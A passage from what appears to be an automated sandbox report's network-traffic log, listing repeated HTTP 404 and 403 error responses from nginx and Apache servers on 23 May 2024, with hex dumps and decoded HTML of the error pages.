20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Thu, 23 May 2024 13:19:08 GMT | Content-Type: text/html | Content-Length: 3650 | Connection: close | ETag: "636d2d22-e42" | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Thu, 23 May 2024 13:19:11 GMT | Content-Type: text/html | Content-Length: 3650 | Connection: close | ETag: "636d2d22-e42" | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.20.1 | Date: Thu, 23 May 2024 13:19:14 GMT | Content-Type: text/html | Content-Length: 3650 | Connection: close | ETag: "636d2d22-e42" | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found content-type: text/html; charset=UTF-8 x-request-id: 102edd6b-9466-4f7e-8804-87a87faaa0c4 x-runtime: 0.025563 content-length: 18245 connection: close
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found content-type: text/html; charset=UTF-8 x-request-id: cb9f6b69-dc63-4e2d-be7d-c6acb065fe0a x-runtime: 0.051811 content-length: 18269 connection: close
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found content-type: text/html; charset=UTF-8 x-request-id: 4b985045-4e35-4cf0-bbf2-5ba0b279109b x-runtime: 0.023026 content-length: 19281 connection: close
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 13:20:00 GMT Server: Apache Content-Length: 514 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 13:20:02 GMT Server: Apache Content-Length: 514 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 13:20:06 GMT Server: Apache Content-Length: 514 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 13:20:09 GMT Server: Apache Content-Length: 514 Connection: close Content-Type: text/html; charset=utf-8 Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div><!-- partial --> </body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Server: nginx Date: Thu, 23 May 2024 13:20:43 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Server: nginx Date: Thu, 23 May 2024 13:20:45 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Server: nginx Date: Thu, 23 May 2024 13:20:48 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx-reuseport/1.21.1 Date: Thu, 23 May 2024 13:21:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Powered-By: PHP/8.3.2 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://novosti-dubai.ru/wp-json/>; rel="https://api.w.org/" Content-Encoding: gzip
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx-reuseport/1.21.1 Date: Thu, 23 May 2024 13:21:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Powered-By: PHP/8.3.2 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://novosti-dubai.ru/wp-json/>; rel="https://api.w.org/" Content-Encoding: gzip
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx-reuseport/1.21.1 Date: Thu, 23 May 2024 13:21:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Powered-By: PHP/8.3.2 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://novosti-dubai.ru/wp-json/>; rel="https://api.w.org/" Content-Encoding: gzip
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx-reuseport/1.21.1 Date: Thu, 23 May 2024 13:21:44 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx-reuseport/1.21.1 Date: Thu, 23 May 2024 13:21:48 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx-reuseport/1.21.1 Date: Thu, 23 May 2024 13:21:50 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Thu, 23 May 2024 13:21:53 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 283Connection: closeVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 35 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 64 76 69 7a 68 65 6e 69 65 2d 70 61 6c 6c 65 74 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.dvizhenie-pallet.ru Port 80</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 13:22:00 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 13:22:03 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 13:22:06 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 13:22:08 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 